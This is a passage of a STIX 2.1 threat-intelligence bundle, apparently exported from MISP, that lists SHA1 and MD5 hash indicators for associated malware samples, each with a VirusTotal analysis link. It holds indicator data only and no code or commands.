"value": "https://www.virustotal.com/file/aaa1511a156a11cff7e09367184972c067b65cae6573a8b4844dbe0a01894118/analysis/1458400107/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82a4-b0c8-4e79-b971-4db102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:16.000Z",
|
|
"modified": "2017-03-29T09:47:16.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 78961c49fa961bac01ebc8ef62077bc8fc8a3389f39fd7ee9d655447f0282fe2",
|
|
"pattern": "[file:hashes.SHA1 = '85d9c0f34185f7ba900d4d2a875dd037bb484d73']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:16Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82a4-d3dc-4ea1-afa6-40ae02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:16.000Z",
|
|
"modified": "2017-03-29T09:47:16.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 78961c49fa961bac01ebc8ef62077bc8fc8a3389f39fd7ee9d655447f0282fe2",
|
|
"pattern": "[file:hashes.MD5 = '88cbc93d9b36ed44e8152f58da053d2b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:16Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82a5-7ea0-4232-9946-44a402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:17.000Z",
|
|
"modified": "2017-03-29T09:47:17.000Z",
|
|
"first_observed": "2017-03-29T09:47:17Z",
|
|
"last_observed": "2017-03-29T09:47:17Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82a5-7ea0-4232-9946-44a402de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82a5-7ea0-4232-9946-44a402de0b81",
|
|
"value": "https://www.virustotal.com/file/78961c49fa961bac01ebc8ef62077bc8fc8a3389f39fd7ee9d655447f0282fe2/analysis/1434632850/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82a6-46cc-468d-96a6-45ec02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:18.000Z",
|
|
"modified": "2017-03-29T09:47:18.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 2ba2491ce6a1814206dfe2aa9b1129f6085f1a18fd9b8c831caad286b095ee90",
|
|
"pattern": "[file:hashes.SHA1 = '7efb112fc92c62d062ee886a10bbb612631a935b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:18Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82a7-ea80-4efd-b295-47d002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:19.000Z",
|
|
"modified": "2017-03-29T09:47:19.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 2ba2491ce6a1814206dfe2aa9b1129f6085f1a18fd9b8c831caad286b095ee90",
|
|
"pattern": "[file:hashes.MD5 = '42d083a240014d8c17e8050d9ac0f735']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:19Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82a8-3c70-437b-b559-45b502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:20.000Z",
|
|
"modified": "2017-03-29T09:47:20.000Z",
|
|
"first_observed": "2017-03-29T09:47:20Z",
|
|
"last_observed": "2017-03-29T09:47:20Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82a8-3c70-437b-b559-45b502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82a8-3c70-437b-b559-45b502de0b81",
|
|
"value": "https://www.virustotal.com/file/2ba2491ce6a1814206dfe2aa9b1129f6085f1a18fd9b8c831caad286b095ee90/analysis/1489573683/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82a9-04b0-4007-a19e-4a2c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:21.000Z",
|
|
"modified": "2017-03-29T09:47:21.000Z",
|
|
"description": "Associated sample - Xchecked via VT: b10a1189aeb784c899bb5eb46b6cf1528b2ef6e3c0673159db4438e7aa39f6d7",
|
|
"pattern": "[file:hashes.SHA1 = '47d97ecf42c16027b24bbaa05a329cd2e7ee1adb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:21Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82aa-a578-4b11-8ee8-424802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:22.000Z",
|
|
"modified": "2017-03-29T09:47:22.000Z",
|
|
"description": "Associated sample - Xchecked via VT: b10a1189aeb784c899bb5eb46b6cf1528b2ef6e3c0673159db4438e7aa39f6d7",
|
|
"pattern": "[file:hashes.MD5 = 'bf29bd14bf768f5be95d2307e9934beb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:22Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82ab-b44c-4828-bb18-449202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:23.000Z",
|
|
"modified": "2017-03-29T09:47:23.000Z",
|
|
"first_observed": "2017-03-29T09:47:23Z",
|
|
"last_observed": "2017-03-29T09:47:23Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82ab-b44c-4828-bb18-449202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82ab-b44c-4828-bb18-449202de0b81",
|
|
"value": "https://www.virustotal.com/file/b10a1189aeb784c899bb5eb46b6cf1528b2ef6e3c0673159db4438e7aa39f6d7/analysis/1477227784/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82ac-2820-4d74-9756-492b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:24.000Z",
|
|
"modified": "2017-03-29T09:47:24.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 829797843357a5417f4de7b7f8f970ccfaccf30ecc80ed9c15e796897012d3e5",
|
|
"pattern": "[file:hashes.SHA1 = '364d7c9327864f9c345ddee6ed90c1df66033050']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:24Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82ad-2e68-4614-bcdb-47d802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:25.000Z",
|
|
"modified": "2017-03-29T09:47:25.000Z",
|
|
"description": "Associated sample - Xchecked via VT: 829797843357a5417f4de7b7f8f970ccfaccf30ecc80ed9c15e796897012d3e5",
|
|
"pattern": "[file:hashes.MD5 = '1cf4b625c05aefcf0a03148ca0170d5e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:25Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82ad-95d0-42c1-b577-4de302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:25.000Z",
|
|
"modified": "2017-03-29T09:47:25.000Z",
|
|
"first_observed": "2017-03-29T09:47:25Z",
|
|
"last_observed": "2017-03-29T09:47:25Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82ad-95d0-42c1-b577-4de302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82ad-95d0-42c1-b577-4de302de0b81",
|
|
"value": "https://www.virustotal.com/file/829797843357a5417f4de7b7f8f970ccfaccf30ecc80ed9c15e796897012d3e5/analysis/1481695662/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82ae-7458-4cdc-a97a-440002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:26.000Z",
|
|
"modified": "2017-03-29T09:47:26.000Z",
|
|
"description": "Associated sample - Xchecked via VT: b91fbf574bf080af82cd24977d00205dc0860ad7afb01f8f4a0ce0f910f9de6e",
|
|
"pattern": "[file:hashes.SHA1 = '41ad0b66c571b1c872f94c4eeab312176e2be5ae']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:26Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82af-7368-484f-8403-4fd002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:27.000Z",
|
|
"modified": "2017-03-29T09:47:27.000Z",
|
|
"description": "Associated sample - Xchecked via VT: b91fbf574bf080af82cd24977d00205dc0860ad7afb01f8f4a0ce0f910f9de6e",
|
|
"pattern": "[file:hashes.MD5 = '63145fd5c4f214df70e89d92e87b55de']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:27Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82b0-2b38-428d-8417-447a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:28.000Z",
|
|
"modified": "2017-03-29T09:47:28.000Z",
|
|
"first_observed": "2017-03-29T09:47:28Z",
|
|
"last_observed": "2017-03-29T09:47:28Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82b0-2b38-428d-8417-447a02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82b0-2b38-428d-8417-447a02de0b81",
|
|
"value": "https://www.virustotal.com/file/b91fbf574bf080af82cd24977d00205dc0860ad7afb01f8f4a0ce0f910f9de6e/analysis/1483519786/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82b1-9048-4e04-84c1-428102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:29.000Z",
|
|
"modified": "2017-03-29T09:47:29.000Z",
|
|
"description": "Associated sample - Xchecked via VT: b01756a3f4b8d687a9fce4301f5f56b4dfb7befe29550096b262935f63f02cc4",
|
|
"pattern": "[file:hashes.SHA1 = '44d3ebc42915938a26debcde31dcda9f37c89dca']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:29Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82b2-c638-452b-96a4-43bd02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:30.000Z",
|
|
"modified": "2017-03-29T09:47:30.000Z",
|
|
"description": "Associated sample - Xchecked via VT: b01756a3f4b8d687a9fce4301f5f56b4dfb7befe29550096b262935f63f02cc4",
|
|
"pattern": "[file:hashes.MD5 = 'be721b7e11f520137e72cb212d75c665']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:30Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82b3-dcd4-44ae-bdac-48ca02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:31.000Z",
|
|
"modified": "2017-03-29T09:47:31.000Z",
|
|
"first_observed": "2017-03-29T09:47:31Z",
|
|
"last_observed": "2017-03-29T09:47:31Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82b3-dcd4-44ae-bdac-48ca02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82b3-dcd4-44ae-bdac-48ca02de0b81",
|
|
"value": "https://www.virustotal.com/file/b01756a3f4b8d687a9fce4301f5f56b4dfb7befe29550096b262935f63f02cc4/analysis/1485525564/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82b4-5b00-40c8-b5a8-443c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:32.000Z",
|
|
"modified": "2017-03-29T09:47:32.000Z",
|
|
"description": "Associated sample - Xchecked via VT: a8779654e5abf142aaaca29b1abc0cbf1f5430e8a8fe7d955ae3ba6f1a9a3747",
|
|
"pattern": "[file:hashes.SHA1 = '97247692c65a1226fac8888fd22dabaabd81af9e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82b5-45a8-4734-ac34-4bb602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:33.000Z",
|
|
"modified": "2017-03-29T09:47:33.000Z",
|
|
"description": "Associated sample - Xchecked via VT: a8779654e5abf142aaaca29b1abc0cbf1f5430e8a8fe7d955ae3ba6f1a9a3747",
|
|
"pattern": "[file:hashes.MD5 = '84e6a085894495375bafda9f784f799d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82b5-a164-4060-92f3-456f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:33.000Z",
|
|
"modified": "2017-03-29T09:47:33.000Z",
|
|
"first_observed": "2017-03-29T09:47:33Z",
|
|
"last_observed": "2017-03-29T09:47:33Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82b5-a164-4060-92f3-456f02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82b5-a164-4060-92f3-456f02de0b81",
|
|
"value": "https://www.virustotal.com/file/a8779654e5abf142aaaca29b1abc0cbf1f5430e8a8fe7d955ae3ba6f1a9a3747/analysis/1429336909/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82b6-8060-4ca3-9c11-4a3d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:34.000Z",
|
|
"modified": "2017-03-29T09:47:34.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 8eef688751eed591bedd2fcc18d32bb84df11fdda62a16c963561aeeae56f6f4",
|
|
"pattern": "[file:hashes.SHA1 = '8a597731b11d3d0a2d70837cfe826b7fe4bc3bf3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:34Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82b7-3c44-4404-a616-432b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:35.000Z",
|
|
"modified": "2017-03-29T09:47:35.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 8eef688751eed591bedd2fcc18d32bb84df11fdda62a16c963561aeeae56f6f4",
|
|
"pattern": "[file:hashes.MD5 = 'ba16d0eb9646876b1e0359ebf58e2fbf']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82b8-c338-40c1-855d-4b8e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:36.000Z",
|
|
"modified": "2017-03-29T09:47:36.000Z",
|
|
"first_observed": "2017-03-29T09:47:36Z",
|
|
"last_observed": "2017-03-29T09:47:36Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82b8-c338-40c1-855d-4b8e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82b8-c338-40c1-855d-4b8e02de0b81",
|
|
"value": "https://www.virustotal.com/file/8eef688751eed591bedd2fcc18d32bb84df11fdda62a16c963561aeeae56f6f4/analysis/1445895778/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82b9-074c-4ed6-9f5a-431d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:37.000Z",
|
|
"modified": "2017-03-29T09:47:37.000Z",
|
|
"description": "Associated samples - Xchecked via VT: bf3869e420ac8686b9ae3b14d679f45b34909ff998887f9fd0c8126853d6a4ed",
|
|
"pattern": "[file:hashes.SHA1 = '995c65fae9fe7ac116d88c0cdc94241cb51785b8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82ba-3c8c-4cf1-9f56-4e5002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:38.000Z",
|
|
"modified": "2017-03-29T09:47:38.000Z",
|
|
"description": "Associated samples - Xchecked via VT: bf3869e420ac8686b9ae3b14d679f45b34909ff998887f9fd0c8126853d6a4ed",
|
|
"pattern": "[file:hashes.MD5 = '155a8dc5a4d32bd629b34f64ca69755d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:38Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82bb-88c0-437a-b179-4fff02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:39.000Z",
|
|
"modified": "2017-03-29T09:47:39.000Z",
|
|
"first_observed": "2017-03-29T09:47:39Z",
|
|
"last_observed": "2017-03-29T09:47:39Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82bb-88c0-437a-b179-4fff02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db82bb-88c0-437a-b179-4fff02de0b81",
|
|
"value": "https://www.virustotal.com/file/bf3869e420ac8686b9ae3b14d679f45b34909ff998887f9fd0c8126853d6a4ed/analysis/1439047482/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82bc-c7c8-43be-92a8-4a0402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:40.000Z",
|
|
"modified": "2017-03-29T09:47:40.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 871cefc4f9faf8658804dbe8332e3b511172ea29545e13c303ae1809edf8a0f6",
|
|
"pattern": "[file:hashes.SHA1 = 'e3a964f7b52e223587ae014b0c065d276c36f7c9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db82bd-1624-4c1d-a1fc-41c202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:41.000Z",
|
|
"modified": "2017-03-29T09:47:41.000Z",
|
|
"description": "Associated samples - Xchecked via VT: 871cefc4f9faf8658804dbe8332e3b511172ea29545e13c303ae1809edf8a0f6",
|
|
"pattern": "[file:hashes.MD5 = 'ecc9dfc45dde31d771e806abd109d31f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:47:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db82be-e58c-4bc9-8f93-4eba02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:47:42.000Z",
|
|
"modified": "2017-03-29T09:47:42.000Z",
|
|
"first_observed": "2017-03-29T09:47:42Z",
|
|
"last_observed": "2017-03-29T09:47:42Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db82be-e58c-4bc9-8f93-4eba02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
